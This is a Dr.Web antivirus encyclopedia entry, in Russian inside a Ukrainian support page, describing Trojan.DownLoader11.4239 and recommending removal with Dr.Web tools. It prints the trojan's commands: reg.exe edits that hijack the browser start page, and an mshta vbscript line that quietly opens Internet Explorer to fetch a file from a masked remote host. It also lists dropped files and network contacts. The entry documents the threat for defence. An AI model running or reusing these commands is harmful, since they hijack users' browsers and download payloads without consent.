Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader11.4239

Добавлен в вирусную базу Dr.Web: 2014-04-21

Описание добавлено:

Техническая информация

Вредоносные функции:
Запускает на исполнение:
  • '<SYSTEM32>\reg.exe' add "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://12#.#ogou.com/?22###" /f
  • '%PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE' http://f.####shengo.net/<Имя вируса>.exe/css1.css
  • '<SYSTEM32>\notepad.exe' %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\css1[1].css
  • '<SYSTEM32>\reg.exe' add "HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://12#.#ogou.com/?22###" /f
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\s1.bat" "
  • '<SYSTEM32>\reg.exe' add "HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /t reg_expand_sz /d "%PROGRAM_FILES%\Internet Explorer\iexplore.exe http://12#.#ogou.com/?22#### /f
  • '<SYSTEM32>\mshta.exe' vbscript:CreateObject("WScript.Shell").Run("iexplore http://f.####shengo.net/<Имя вируса>.exe/css1.css",0)(window.close)
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе:
Создает следующие файлы:
  • %HOMEPATH%\Desktop\360дЇААЖч.lnk
  • %HOMEPATH%\Desktop\Intrenet Explorer.lnk
  • %HOMEPATH%\Start Menu\Programs\QKanKan\Uninstall.lnk
  • %TEMP%\nsi6.tmp\System.dll
  • %PROGRAM_FILES%\QKanKan\360дЇААЖч.ico
  • %PROGRAM_FILES%\QKanKan\Intrenet Explorer.ico
  • %TEMP%\nsi6.tmp\ExecCmd.dll
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\css1[1].css
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\css1[1].css:Zone.Identifier
  • %PROGRAM_FILES%\QKanKan\uninst.exe
  • %TEMP%\s1.bat
  • %TEMP%\nsi6.tmp\nsProcess.dll
  • %TEMP%\i.rar
  • %TEMP%\nsz3.tmp
  • %TEMP%\nsd4.tmp
  • %TEMP%\nsa2.tmp\Base64.dll
  • %TEMP%\nsa2.tmp\Inetc.dll
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\iplookup[1].php
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\iplookup[1].php
  • %TEMP%\nsz7.tmp
  • %TEMP%\nse8.tmp
  • %TEMP%\nsa2.tmp\System.dll
  • %TEMP%\nsi6.tmp\Base64.dll
  • %TEMP%\nsi6.tmp\Inetc.dll
Удаляет следующие файлы:
  • %TEMP%\nsi6.tmp\ExecCmd.dll
  • %TEMP%\nsi6.tmp\Base64.dll
  • %TEMP%\nsi6.tmp\Inetc.dll
  • %TEMP%\nsi6.tmp\System.dll
  • %TEMP%\nsi6.tmp\nsProcess.dll
  • %TEMP%\nsd4.tmp
  • %TEMP%\nsz3.tmp
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\iplookup[1].php
  • %TEMP%\nse8.tmp
  • %TEMP%\nsz7.tmp
Сетевая активность:
Подключается к:
  • 'f.####shengo.net':80
  • 'do##.#iyumivip.com':21
  • 'localhost':1041
  • 'in#.###ol.sina.com.cn':80
  • 'do##.#ifeivisa.com':21
TCP:
Запросы HTTP GET:
  • f.####shengo.net/<Служебное имя>.exe/css1.css
  • in#.###ol.sina.com.cn/iplookup/iplookup.php
UDP:
  • DNS ASK f.####shengo.net
  • DNS ASK do##.#iyumivip.com
  • DNS ASK in#.###ol.sina.com.cn
  • DNS ASK do##.#ifeivisa.com
Другое:
Ищет следующие окна:
  • ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
  • ClassName: '' WindowName: '(null)'
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'
  • ClassName: 'MS_AutodialMonitor' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке